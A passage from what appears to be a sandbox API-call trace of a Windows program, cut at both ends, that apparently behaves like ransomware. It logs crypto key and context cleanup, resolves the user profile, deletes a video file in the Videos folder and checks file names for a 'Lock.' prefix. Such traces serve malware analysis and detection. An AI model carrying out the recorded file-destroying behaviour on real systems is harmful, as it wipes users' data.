out: lpsz="SSA4F00A00447") returned 0xd [0214.873] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0214.873] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0214.873] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0214.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab4a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0214.873] CryptDestroyKey (hKey=0x9e1cb8) returned 1 [0214.873] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.873] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.873] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.873] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.873] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.873] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.873] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.874] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.874] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.874] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.874] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.874] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.874] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.874] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.874] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.874] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0214.874] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.874] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0214.874] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0214.874] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.874] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.874] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.874] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.874] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.874] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0214.874] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.874] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0214.874] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.874] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.874] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0214.874] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.875] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0214.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.875] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.875] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.875] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.875] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.875] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.875] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.875] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.875] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.875] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.875] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.875] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.875] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.875] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0214.875] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.875] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0214.875] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.875] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0214.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0214.876] CryptReleaseContext (hProv=0xa7c330, dwFlags=0x0) returned 1 [0214.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.876] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.876] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.876] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0214.876] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.876] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.876] FreeLibrary (hLibModule=0x76390000) returned 1 [0214.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.876] CloseHandle (hObject=0x510) returned 1 [0214.878] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.878] CloseHandle (hObject=0x504) returned 1 [0214.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.880] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.880] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.880] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.880] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/vMM vqaD0kHJ4F.mp4", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\vMM vqaD0kHJ4F.mp4", lpFilePart=0x8cedf4*="vMM vqaD0kHJ4F.mp4") returned 0x29 [0214.880] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\vMM vqaD0kHJ4F.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\vmm vqad0khj4f.mp4")) returned 0x20 [0214.880] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\vMM vqaD0kHJ4F.mp4", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32fd840, ftCreationTime.dwHighDateTime=0x1d5cc1b, ftLastAccessTime.dwLowDateTime=0x9ccacc80, ftLastAccessTime.dwHighDateTime=0x1d5c7fc, ftLastWriteTime.dwLowDateTime=0x9ccacc80, ftLastWriteTime.dwHighDateTime=0x1d5c7fc, nFileSizeHigh=0x0, nFileSizeLow=0xbb15, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="vMM vqaD0kHJ4F.mp4", cAlternateFileName="VMMVQA~1.MP4")) returned 0x9e1ab8 [0214.880] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\vMM vqaD0kHJ4F.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\vmm vqad0khj4f.mp4")) returned 1 [0214.883] FindNextFileW (in: hFindFile=0x9e1ab8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32fd840, ftCreationTime.dwHighDateTime=0x1d5cc1b, ftLastAccessTime.dwLowDateTime=0x9ccacc80, ftLastAccessTime.dwHighDateTime=0x1d5c7fc, ftLastWriteTime.dwLowDateTime=0x9ccacc80, ftLastWriteTime.dwHighDateTime=0x1d5c7fc, nFileSizeHigh=0x0, nFileSizeLow=0xbb15, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="vMM vqaD0kHJ4F.mp4", cAlternateFileName="VMMVQA~1.MP4")) returned 0 [0214.883] FindClose (in: hFindFile=0x9e1ab8 | out: hFindFile=0x9e1ab8) returned 1 [0214.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75068 | out: hHeap=0x2af0000) returned 1 [0214.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0214.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.883] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0214.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0214.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0214.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0214.883] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafd8 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0214.884] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74980 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0214.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0214.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0214.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0214.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0214.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0214.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x54) returned 0x2a5f6c0 [0214.885] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/vMM vqaD0kHJ4F.mp4", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\vMM vqaD0kHJ4F.mp4", lpFilePart=0x8cf650*="vMM vqaD0kHJ4F.mp4") returned 0x29 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0214.885] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\vMM vqaD0kHJ4F.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\vmm vqad0khj4f.mp4")) returned 0xffffffff [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74980 | out: hHeap=0x2af0000) returned 1 [0214.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0214.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0214.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.886] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0214.886] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.886] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0214.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0214.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0214.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0214.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0214.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0214.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0214.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0214.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0214.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X3KII9Ky2zq5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3KII9Ky2zq5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KII9Ky2zq5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="II9Ky2zq5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I9Ky2zq5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Ky2zq5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ky2zq5leE1M.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0214.886] 